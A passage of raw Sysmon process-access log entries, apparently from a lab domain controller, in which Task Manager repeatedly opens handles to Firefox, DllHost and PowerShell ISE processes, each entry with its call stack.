Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205092Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1595-601B-0038-00000000A301}6056C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+1e590|C:\Windows\system32\taskmgr.exe+1a25e|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205091Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1595-601B-0038-00000000A301}6056C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205090Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1595-601B-0038-00000000A301}6056C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205089Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1595-601B-0038-00000000A301}6056C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205088Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1595-601B-FF37-00000000A301}4612C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205087Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1595-601B-FF37-00000000A301}4612C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+1e590|C:\Windows\system32\taskmgr.exe+1a25e|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205086Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1595-601B-FF37-00000000A301}4612C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205085Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1595-601B-FF37-00000000A301}4612C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205084Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1595-601B-FF37-00000000A301}4612C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205083Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1595-601B-FE37-00000000A301}4988C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205082Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1595-601B-FE37-00000000A301}4988C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+1e590|C:\Windows\system32\taskmgr.exe+1a25e|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205081Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1595-601B-FE37-00000000A301}4988C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205080Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1595-601B-FE37-00000000A301}4988C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205079Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1595-601B-FE37-00000000A301}4988C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205078Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1594-601B-FD37-00000000A301}3796C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205077Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1594-601B-FD37-00000000A301}3796C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+1e590|C:\Windows\system32\taskmgr.exe+1a25e|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205076Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1594-601B-FD37-00000000A301}3796C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205075Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1594-601B-FD37-00000000A301}3796C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205074Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1594-601B-FD37-00000000A301}3796C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205073Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1594-601B-FC37-00000000A301}6100C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205072Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1594-601B-FC37-00000000A301}6100C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+1e590|C:\Windows\system32\taskmgr.exe+1a25e|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205071Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1594-601B-FC37-00000000A301}6100C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205070Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1594-601B-FC37-00000000A301}6100C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205069Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1594-601B-FC37-00000000A301}6100C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205068Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1592-601B-FA37-00000000A301}2356C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205067Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1592-601B-FA37-00000000A301}2356C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+1e590|C:\Windows\system32\taskmgr.exe+1a25e|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205066Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1592-601B-FA37-00000000A301}2356C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205065Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1592-601B-FA37-00000000A301}2356C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205064Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1592-601B-FA37-00000000A301}2356C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205063Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1545-601B-E837-00000000A301}1100C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205062Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1545-601B-E837-00000000A301}1100C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+1e590|C:\Windows\system32\taskmgr.exe+1a25e|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205061Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1545-601B-E837-00000000A301}1100C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205060Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1545-601B-E837-00000000A301}1100C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205059Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-1545-601B-E837-00000000A301}1100C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205058Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.848{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-B991-6019-E00E-00000000A301}6408C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 